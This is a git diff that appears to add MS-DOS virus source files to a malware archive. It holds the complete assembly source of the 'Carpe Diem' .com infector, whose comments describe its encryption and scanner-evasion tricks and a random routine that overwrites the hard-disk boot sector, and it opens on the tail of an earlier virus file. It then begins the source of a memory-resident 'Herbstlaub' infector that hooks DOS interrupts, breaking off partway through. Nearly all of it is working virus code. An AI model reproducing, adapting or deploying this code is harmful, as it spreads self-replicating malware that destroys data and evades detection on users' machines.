message too + lea dx,[bp+signature] + int 21h + + +restore_start: ;copy the four saved bytes to + lea si,[bp+orgbuf2] ;beginning of file in memory + mov di,100h + movsw + movsw + + +restore_dir: ;change back to original + lea dx,[bp+end_of_virus+2ch] ;dir + mov ah,3bh + int 21h + +exit_proc: ;return to start of program + mov bx,100h ;This will be enrypted in + push bx ;infected files, so anti-vir + ;progs won't complain. 
+ xor ax,ax ;for org virus to push on + retn ;the stack for ret + + +ch_dir: + lea dx,[bp+dot_dot] ;use dot-dot method + mov ah,3bh + int 21h + jnc no_err ;sub dir existed + pop ax ;otherwise all files are checked. exit! + jmp no_more_files ;pop the ip pointer from the stack +no_err: ;and jump to the end part + ret + +signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$' +country db " Sweden 16/11/93" +filespec db '*.com',0 +dot_dot db '..',0 +orgbuf db 90h,90h,50h,0c3h ;instructions to exit the +orgbuf2 db 4 dup(0) ;scratch after infection +startbuf db 4 dup(0) ;nop,nop,push ax,ret +end_of_virus: +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; The virus code ends here but the point below here (the heap) +; is used to store temporary variables such as the dta-area and +; the starting directory +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +cseg ends + end start_of_virus \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.carpe.asm b/MSDOS/Virus.MSDOS.Unknown.carpe.asm new file mode 100644 index 00000000..b59dd216 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carpe.asm 
@@ -0,0 +1,293 @@ +; Well this is my (Raver's) first scratch virus. +; This virus is mainly made for educational purpose (my own!). +; It's pretty well commented in an easy way so even you folks +; with little experience with assembler should be able to follow +; the code! + +; It's a pretty simple non-overwriting .com-infector with a harmless +; nuking routine. It clears and restores the file attributes and +; date/time stamp and finds and infects files using the dot-dot method. +; An encryption routine and some "unusual" instructions are included to +; avoid detection by the common virus scanners. At release date, see +; above, neither F-prot nor Tb-scan found traces of virus code! + +; There is about a 5 percent chance that the nuking routine will be +; activated, it checks the system time for 1/100 of a second. If it's +; activated it'll overwrite the first sector on the fixed disk (c:) +; which contains the boot sector. This might seem cruel but, infact, +; it's quite harmless 'cause norton utilities and other programs +; easily restore the boot sector. It's there just to make inexperienced +; users (lamers!) nervous! + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; CARPE DIEM! - Seize the day +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: ;entry point + call get_off ;this somewhat unusual code won't +get_off: ;produce a flexible entry point flag + mov si,sp ;get the delta offset + mov bp,word ptr ss:[si] ;offset is on top of stack + sub bp,offset get_off ;put it in bp + inc sp ;restore sp to it's original + inc sp + +; call encrypt_decrypt ;decrypt the contents of the program + mov ax,bp ;use alternative code - otherwise + add ax,116h ;f-prot will recognize it as Radyum!!!! 
+ push ax + jmp encrypt_decrypt + jmp encrypted_code_start ;jmp to the (en/de)crypted virus area + + +encryption_value dw 0 ;random value for encryption routine + + +write_virus_to_file: ;proc to append virus code to file + + call encrypt_decrypt ;encrypt the virus before write + + mov cx,offset end_of_virus-100h ;length of virus to be written + lea dx,[bp] ;write from start + mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of + inc ah ;file length in DTA. Is + add dx,ax ;always 0 in .com-files. + mov ah,40h ;Use this trick to fool + int 21h ;heuristic searches. + ;dx = delta offset+100h + call encrypt_decrypt ;decrypt the code for + ret ;further processing. + + +encrypt_decrypt: ;proc to (en/de)crypt the code + mov dx,word ptr [bp+encryption_value] ;use random number for every + lea si,[bp+encrypted_code_start] ;new infection + mov cx,(end_of_virus-encrypted_code_start+1)/2 + +crypt_loop: ;xor the whole virus code + xor word ptr [si],dx ;between encrypted_code_start + add si,2 ;and end_of_virus + loop crypt_loop + + ret + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; Here the part that will be encrypted starts, i.e. all code +; except the encryption routine and the routine to append virus +; to file. +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +encrypted_code_start: + + cld + + mov ah,1ah ;Set DTA Transfer area to after + lea dx,[bp+end_of_virus] ;after the end of file to save file + int 21h ;size. Note: do not use default 80h + ;as DTA area since the parameters to + ;the "real" program will be overwritten! + + lea si,[bp+orgbuf] ;Transfer buffer contents + lea di,[bp+orgbuf2] ;to be restored to the beginning + mov cx,2 ;for restart of the "real" program + rep movsw + + mov di,2 ;Infection counter, 2 files every run + + mov ah,19h ;get current drive + int 21h + cmp al,2 ;check if a: or b: + jae get_cur_dir ;if so, skip infection. 
Otherwise + jmp no_more_files ;the user will most likely get + ;quite suspicious +get_cur_dir: + mov ah,47h ;get starting directory + xor dl,dl ;it will be changed by the + lea si,[bp+end_of_virus+2ch] ;dot-dot method later on + int 21h + +find_first: ;start finding the first .com file + mov cx,7 ;in every new dir + lea dx,[bp+filespec] + mov ah,4eh + int 21h + jnc clear_attribs ;successive? + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + ;otherwise jmp + +find_next: ;this is the upper point of the find + mov ah,4fh ;files loop in a dir + int 21h + jnc clear_attribs + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + +clear_attribs: ;set the file attribute to 0 + mov ax,4301h + xor cx,cx + lea dx,[bp+end_of_virus+1eh] + int 21h + +open_file: ;open file to be infected + mov ax,3d02h +; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs + int 21h + + xchg ax,bx ;Put file handle in bx + +read_file: ;read first four bytes of file + mov ah,3fh ;They will be restore to the start + mov cx,4 ;after the virus is finnished + lea dx,[bp+orgbuf] ;so the program can execute + int 21h + +check_already_infected: ;check the first to bytes and check + mov si,dx ;if the file is already infected + lea si,[bp+orgbuf] + cmp word ptr [si],0e990h + je already_infected ;if so, jmp + + cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com + jz already_infected ;if so, don't infect + + mov ax,word ptr [bp+end_of_virus+1ah] ;check file size + cmp ax,500 ;and skip short and + jb already_infected ;long files + cmp ax,64000 + ja already_infected + + + mov ax,4202h ;get lenght of initial jmp in ax + xor cx,cx + xor dx,dx + int 21h + + sub ax,4 ;subtract the first four bytes, which + ;will be overwritten + + mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop + mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning + ;notice the reversed order! 
+ + mov ax,4200h ;move to beginning of file + int 21h + + mov ah,40h ;write the new instructions + mov cx,4 + lea dx,[bp+startbuf] + int 21h + + mov ax,4202h ;move to end of file + xor cx,cx + xor dx,dx + int 21h + + mov ah,2ch ;get a random number from + int 21h ;system clock for the + mov word ptr [bp+encryption_value],dx ;encryption routine + call write_virus_to_file ;append the virus code + jmp restore_time_date + +already_infected: ;if already encrypted increase + inc di ;infection counter with one + +restore_time_date: ;restore file time & date + lea si,[bp+end_of_virus+16h] + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +close_file: ;close the file handle + mov ah,3eh + int 21h + +set_old_attrib: ;restore the old file attrib + mov ax,4301h + xor ch,ch + mov cl,byte ptr [bp+end_of_virus+15h] + lea dx,[bp+end_of_virus+1eh] + int 21h + + dec di ;decrease infection counter + cmp di,0 ;and check if infection is + jbe no_more_files ;completed + jmp find_next + +no_more_files: + + mov ah,2ch ;get a new random number + int 21h ;5% chance of nuke + cmp dl,5 + ja restore_start ;above 5 no nuke + + mov ax,0301h ;trash the bootsector of c: + mov cx,0001h ;This might seem cruel but + mov dx,0080h ;norton and other programs + lea bx,[bp+start_of_virus] ;easily fix it. It's just + int 13h ;to make the user nervous!! + + mov ah,09h ;deliver a message too + lea dx,[bp+signature] + int 21h + + +restore_start: ;copy the four saved bytes to + lea si,[bp+orgbuf2] ;beginning of file in memory + mov di,100h + movsw + movsw + + +restore_dir: ;change back to original + lea dx,[bp+end_of_virus+2ch] ;dir + mov ah,3bh + int 21h + +exit_proc: ;return to start of program + mov bx,100h ;This will be enrypted in + push bx ;infected files, so anti-vir + ;progs won't complain. 
+ xor ax,ax ;for org virus to push on + retn ;the stack for ret + + +ch_dir: + lea dx,[bp+dot_dot] ;use dot-dot method + mov ah,3bh + int 21h + jnc no_err ;sub dir existed + pop ax ;otherwise all files are checked. exit! + jmp no_more_files ;pop the ip pointer from the stack +no_err: ;and jump to the end part + ret + +signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$' +country db " Sweden 16/11/93" +filespec db '*.com',0 +dot_dot db '..',0 +orgbuf db 90h,90h,50h,0c3h ;instructions to exit the +orgbuf2 db 4 dup(0) ;scratch after infection +startbuf db 4 dup(0) ;nop,nop,push ax,ret +end_of_virus: +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; The virus code ends here but the point below here (the heap) +; is used to store temporary variables such as the dta-area and +; the starting directory +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +cseg ends + end start_of_virus + +... Sorry, the Dog ate my Blue Wave packet. +___ Blue Wave/QWK v2.12 + +--- Oblivion/2 2.10 + diff --git a/MSDOS/Virus.MSDOS.Unknown.cascade.asm b/MSDOS/Virus.MSDOS.Unknown.cascade.asm new file mode 100644 index 00000000..50095b0e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cascade.asm 
@@ -0,0 +1,1188 @@ +PAGE 62,132 +TITLE _HLV_ +SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712 +.RADIX 16 +.LALL + +TRUE EQU 1 +FALSE EQU 0 + +MONTH EQU 9D +YEAR EQU 1991D + +DEMO EQU TRUE + +SWITCHABLE = TRUE +IFDEF _NOSWITCH +SWITCHABLE = FALSE +ENDIF + +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + ===================== + H E R B S T L A U B + ===================== + + + SPRACHE: MASM 4.00 (+) [ fr乭ere Versionen brechen z.B. mit + (not v6.00 ! ) *OUT OF MEMORY* (3.00) ab oder lassen + sogar den PC abst乺zen (1.10) ] + + ( Eine als Beispiel gedachte Batchdatei zur Steuerung der 歜ersetzung + ist am Ende dieses Quelltextes als Kommentar hinzugef乬t. ) + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + W刪rend der 歜ersetzung zu auszugebende Meldungen, 1. Teil. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# +IF1 +REPT 50 +%Out +ENDM; +%Out 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍谀哪哪哪哪哪哪哪哪哪哪哪堪鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊澳哪哪哪哪哪哪哪哪 H E R B S T L A U B 媚哪哪哪哪哪哪哪哪陌昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍滥哪哪哪哪哪哪哪哪哪哪哪侔鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +ENDIF +comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige Assembler - Makros. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# ; +MSDOS MACRO ; + INT 21 ; + ENDM ; +Wait_HRI_or_VRI MACRO ; + LOCAL _X_1, _X_2, _X_3 ; + MOV DX,03DA ; + CLI ; + _X_1: IN AL,DX ; + TEST AL,08 ; + JNZ _X_3 ; + TEST AL,01 ; + JNZ _X_1 ; + _X_2: IN AL,DX ; + TEST AL,01 ; + JZ _X_2 ; + _X_3 LABEL NEAR ; + ENDM ;------; +SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + PUSHF ; + ELSE ; + PUSH _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ;------; +REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + POPF ; + ELSE ; + POP _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ; +MOV_S MACRO S1,S2 ; + PUSH S2 ; + POP S1 ; + ENDM ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- + tomatisch durch den Assembler erzeugt. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +TEXT SEGMENT ; + ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige das Verst刵dnis erleichternde Definitionen. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +NearJmp EQU 0E9 ; +PORT_B_8259A EQU 20 ; +EOI_8259A EQU 20 ; +PORT_B_8255 EQU 61 ; +FIRSTCONST EQU 0131 ; +FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; +FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; +DeCrptd EQU 0 ;-----; +EnCrptd EQU 1 ; +BIOSDATASEG EQU 040 ; +MonoBase EQU 0B000 ; +ColorBase EQU 0B800 ; +B_VIDPAGE EQU THIS WORD + 04E ; +B_TIMERVAR EQU THIS WORD + 06C ; +TimerInt EQU 1C ; +DOS EQU 21 ; +DOS_multi EQU 2F ; +MS_SetDTA EQU 1A ; + DTA_in_PSP EQU 80 ; +MS_SetInt EQU 25 ; +MS_GetDateTime EQU 2A ; +MS_GetVer EQU 30 ; + DOS_v_02 EQU 2 ; +MS_GetInt EQU 35 ; +MS_Open EQU 3Dh ; + Read_Only EQU 0 ; + Read_Write EQU 2 ; +MS_Close EQU 3E ; +MS_Read EQU 3F ; +MS_Write EQU 40 ; +MS_MoveFP EQU 42 ; + OfsFrmTop EQU 0 ; + OfsFrmEnd EQU 02 ; +MS_GetFileAttr EQU 4300 ; +MS_SetFileAttr EQU 4301 ; + Attr_A EQU 20 ; + Attr_SHR EQU 7 ; + Attr_ASHR EQU Attr_A OR Attr_SHR ; +MS_AllocMem EQU 48 ; +MS_ReleaseMem EQU 49 ; + MemCBsig EQU THIS BYTE + 0 ; + MemCBowned EQU THIS WORD + 1 ; + MemCBsize EQU THIS WORD + 3 ; +MS_Exec EQU 4Bh ; + MS_Exec_SF0 EQU 0 ; + Virus_fun EQU 0ffh ; + Virus_Sig EQU 55AA ; +MS_SetPSP EQU 50 ; + PSPsize EQU 00100 ; + PSPCurCom EQU THIS WORD + 016 ; + PSPEnv EQU THIS WORD + 02C ; + PSP_SegJFB EQU THIS WORD + 036 ; + NoEnv EQU 0 ; +MS_GetFileDate EQU 5700 ; +MS_SetFileDate EQU 5701 ; +PSP_100 EQU THIS WORD + PSPsize ; +PSP_102 EQU THIS BYTE + PSPsize + 2 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Crypt1 DB 0 ; +Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; +Crypt3 EQU Crypt1 + PSPsize ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einsprungstelle, entschl乻seln des Virus falls notwendig. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_000: CLI ; + MOV BP,SP ; + CALL XI_001 ; +XI_001: POP BX ; + SUB BX,FIRSTCONST ; + TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; + JZ XI_003 ; + LEA SI,[BX + XR_000] ; + MOV SP,OFFSET EOFC-OFFSET XI_003 ; +XI_002: XOR [SI],SI ; + XOR [SI],SP ; + INC SI ; + DEC SP ; + JNZ XI_002 ; +XI_003 LABEL NEAR ; + XR_000 EQU OFFSET XI_003 + FIRSTBASE ; + XR_001 EQU XI_003 + PSPsize ; + MOV SP,BP ; + JMP SHORT XI_004 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Datenbereich 2. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; + XD_000 DW PSPsize ; +Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; + XD_001 DW 9090 ; +Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; + XD_002 DW 9090 ; +Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; + XD_003 EQU THIS WORD ; + XD_004 EQU THIS BYTE + 2 ; + NOP ; + NOP ; + NOP ; +Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; +Org1stInstr_t1 EQU XD_003 + PSPsize ; +Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; +Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; + XD_005 DW 2 dup ( 9090 ) ; +Org_Int_1C EQU XD_005 + PSPsize ; + XD_006 DW 2 dup ( 9090 ) ; +Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; +Org_Int_21t EQU XD_006 + PSPsize ; + ; +IF SWITCHABLE ; + ; + XD_007 DW 2 dup ( 9090 ) ; +Org_Int_2F EQU XD_007 + PSPsize ; + XD_008 DB 5, "_HLV_ " ; +Cmd_2F EQU XD_008 + PSPsize ; + XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; +Msg_On EQU XD_009 + PSPsize ; + XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; +Msg_Off EQU XD_010 + PSPsize ; + ; +ENDIF ; + ; + XD_011 DW 9090 ; +File_Attributes EQU XD_011 + PSPsize ; + XD_012 DW 9090 ; +File_Date EQU XD_012 + PSPsize ; + XD_013 DW 9090 ; +File_Time EQU XD_013 + PSPsize ; + XD_014 DW 2 dup ( 9090 ) ; +Pathname EQU XD_014 + PSPsize ; + XD_015 DW 2 dup ( 9090 ) ; +File_Size_lsb EQU XD_015 + PSPsize ; +File_Size_msb EQU XD_015 + PSPsize + 2 ; + XD_016 DB NearJmp ; +FirstOpCode_1 EQU XD_016 + PSPsize ; + XD_017 DW 9090 ; +FirstOpCode_2 EQU XD_017 + PSPsize ; + XD_018 DB 90 ; +Num_of_Col EQU XD_018 
+ PSPsize ; + XD_019 DB 90 ; +Last_Line EQU XD_019 + PSPsize ; + XD_020 DB 90 ; +Prevent_Snow? EQU XD_020 + PSPsize ; +Last_Pair EQU THIS WORD + PSPsize ; + XD_021 DB 90 ; + XD_022 DB 90 ; +Last_Char EQU XD_021 + PSPsize ; +Last_Attr EQU XD_022 + PSPsize ; +RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; + XD_023 RecTyp1 <0,0,0> ; +ISR_Flags EQU XD_023 + PSPsize ; + XD_024 DW 9090 ; +Seg_of_VRAM EQU XD_024 + PSPsize ; + XD_025 DW 9090 ; +Page_offset EQU XD_025 + PSPsize ; + XD_026 DW 9090 ; +Speed EQU XD_026 + PSPsize ; + XD_027 DW 9090 ; +XR_002 EQU XD_027 + PSPsize ; + XD_028 DW 9090 ; +XR_003 EQU XD_028 + PSPsize ; + XD_029 DW 9090 ; +Num_of_char EQU XD_029 + PSPsize ; + XD_030 DW 9090 ; +XR_004 EQU XD_030 + PSPsize ; + XD_031 DW 7 dup ( 9090 ) ; +FirstRandom EQU XD_031 + PSPsize ; +LastRandom EQU This Word + PSPsize ; + DW 9090 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Installieren u. relozieren falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_004: CALL XI_005 ; +XI_005 LABEL NEAR ; +XR_005 EQU XI_005 + PSPsize ; + POP BX ; + SUB BX,FIRSTBASE2 ; + MOV CS:[BX+Disp_to_com_2],CS ; + MOV CS:[BX+Initial_AX],AX ; + MOV AX,CS:[BX+Org1stInstr_s1] ; + MOV [PSP_100],AX ; + MOV AL,CS:[BX+Org1stInstr_s2] ; + MOV [PSP_102],AL ; + PUSH BX ; + MOV AH,MS_GetVer ; + MSDOS ; + POP BX ; + CMP AL,DOS_v_02 ; + JB XI_006 ; + MOV AX,MS_Exec * 100 + Virus_fun ; + XOR DI,DI ; + XOR SI,SI ; + MSDOS ; + CMP DI,Virus_sig ; + JNZ XI_007 ; +XI_006: STI ; + MOV_S ES,DS ; + MOV AX,CS:[BX+Initial_AX] ; + JMP DWORD PTR CS:[BX+Disp_to_com_1] ; +XI_007: PUSH BX ; + MOV AX,MS_GetInt * 100 + DOS ; + MSDOS ; + MOV AX,BX ; + POP BX ; + MOV CS:[BX+Org_int_21s],AX ; + MOV CS:[BX+Org_int_21s + 2],ES ;------------; + MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; + MOV BP,CS ;------------; + DEC BP ; + MOV ES,BP ; + MOV SI,CS:[PSPCurCom] ; + MOV ES:[MemCBowned],SI ; + MOV DX,ES:[MemCBsize] ; + MOV ES:[MemCBsize],AX ; + MOV ES:[MemCBsig],'M' ; + SUB DX,AX ; + DEC DX 
; + INC BP ; + ADD BP,AX ; + INC BP ; + MOV ES,BP ; + PUSH BX ; + MOV AH,MS_SetPSP ; + MOV BX,BP ; + MSDOS ; + POP BX ; + XOR DI,DI ; + MOV_S SS,ES ; + PUSH DI ; + LEA DI,[BX+XR_010] ; + MOV SI,DI ; + MOV CX,OFFSET EOFC ; + STD ; + REPZ MOVSB ; + PUSH ES ; + LEA CX,[BX+XR_006] ; + PUSH CX ; + RETF ; +XI_008 LABEL NEAR ; +XR_006 EQU OFFSET XI_008 + FIRSTBASE ; + MOV CS:[BX+Disp_to_com_2],CS ; + LEA CX,[BX+Crypt2] ; + REPZ MOVSB ; + MOV CS:[PSP_SegJFB],CS ; + DEC BP ; + MOV ES,BP ; + MOV ES:[MemCBsize],DX ; + MOV ES:[MemCBsig],'Z' ; + MOV ES:[MemCBowned],CS ; + INC BP ; + MOV ES,BP ; + MOV_S ES,DS ; + MOV_S DS,CS ; + LEA SI,[BX+Crypt2] ; + MOV DI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + PUSH ES ; + LEA AX,[XR_007] ; + PUSH AX ; + RETF ; +XI_009 LABEL NEAR ; +XR_007 EQU XI_009 + PSPsize ; + MOV CS:[PSPEnv],NoEnv ; + MOV CS:[PSPCurCom],CS ; + PUSH DS ; + LEA DX,[XR_008] ; + MOV_S DS,CS ; + MOV AX,MS_SetInt * 100 + DOS ; + MSDOS ; + POP DS ; + MOV AH,MS_SetDTA ; + MOV DX,DTA_in_PSP ; + MSDOS ; + SAVE DS,ES,SI,DI,CX ; + MOV_S ES,CS ; + MOV CX,BIOSDATASEG ; + MOV DS,CX ; + MOV DI,OFFSET FirstRandom ; + MOV SI,OFFSET B_TIMERVAR ; + MOV CL,8 ; + CLD ; + REPZ MOVSW ; + REST CX,DI,SI,ES,DS ; + ; +IF SWITCHABLE ; + ; + PUSH DS ; + MOV AX,MS_GetInt * 100 + DOS_multi ; + MSDOS ; + MOV CS:[Org_Int_2F],BX ; + MOV CS:[Org_Int_2F + 2],ES ; + MOV AX,MS_SetInt * 100 + DOS_multi ; + MOV DX,offset Int_2F_ISR ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; + ; +ENDIF ; + ; + OR CS:[ISR_Flags],MASK ExtCom ; + MOV AH,MS_GetDateTime ; + MSDOS ; + CMP CX,YEAR ; + JZ XI_010 ; + JMP SHORT XI_011 ; +XI_010: CMP DH,MONTH ; + JB XI_011 ; + AND CS:[ISR_Flags],NOT MASK ExtCom ; +XI_011: MOV AX,1518 ; + CALL Random ; + INC AX ; + MOV CS:[XR_002],AX ; + MOV CS:[XR_003],AX ; + MOV CS:[XR_004],1 ; + MOV AX,MS_GetInt * 100 + TimerInt ; + MSDOS ; + MOV CS:[Org_Int_1C],BX ; + MOV CS:[Org_Int_1C + 2],ES ; + PUSH DS ; + MOV AX,MS_SetInt * 100 + TimerInt ; + MOV DX,OFFSET XR_009 ; + MOV_S DS,CS ; + 
MSDOS ; + POP DS ; +XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; + JMP XI_006 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Neue Interrupt 21(h) Behandlungsroutine ( ver刵dert Exec - Funktion ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_013 LABEL NEAR ; +XR_008 EQU XI_013 + PSPsize ; + CMP AH,MS_Exec ; + JZ XI_016 ; +XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; +XI_015: MOV DI,Virus_Sig ; + LES AX,CS:DWORD PTR [Org_Int_21t] ; + MOV DX,CS ; + IRET ; +XI_016: CMP AL,Virus_fun ; + JZ XI_015 ; + CMP AL,MS_Exec_SF0 ; + JNZ XI_014 ; + SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; + MOV CS:[Pathname],DX ; + MOV CS:[Pathname + 2],DS ; + MOV_S ES,CS ; + MOV AX,MS_Open * 100 + Read_Only ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_GetFileDate ; + MSDOS ; + MOV CS:[File_Date],DX ; + MOV CS:[File_Time],CX ; + MOV AH,MS_Read ; + MOV_S DS,CS ; + MOV DX,OFFSET Org1stInstr_t1 ; + MOV CX,3 ; + MSDOS ; + JB XI_018 ; + CMP AX,CX ; + JNZ XI_018 ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + MOV CS:[File_Size_lsb],AX ; + MOV CS:[File_Size_msb],DX ; + MOV AH,MS_Close ; + MSDOS ;---------------; + CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; + JNZ XI_017 ; + JMP XI_025 ; +XI_017: CMP CS:[File_Size_msb],+0 ; + JA XI_018 ; + CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; + JBE XI_019 ; +XI_018: JMP XI_025 ; +XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; + JNZ XI_020 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; + CMP AX,CS:[Org1stInstr_t2] ;---------------; + JZ XI_018 ; + ; +IF DEMO ; +XI_020: CALL DEMO_Infect ; + JMP XI_025 ; + ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 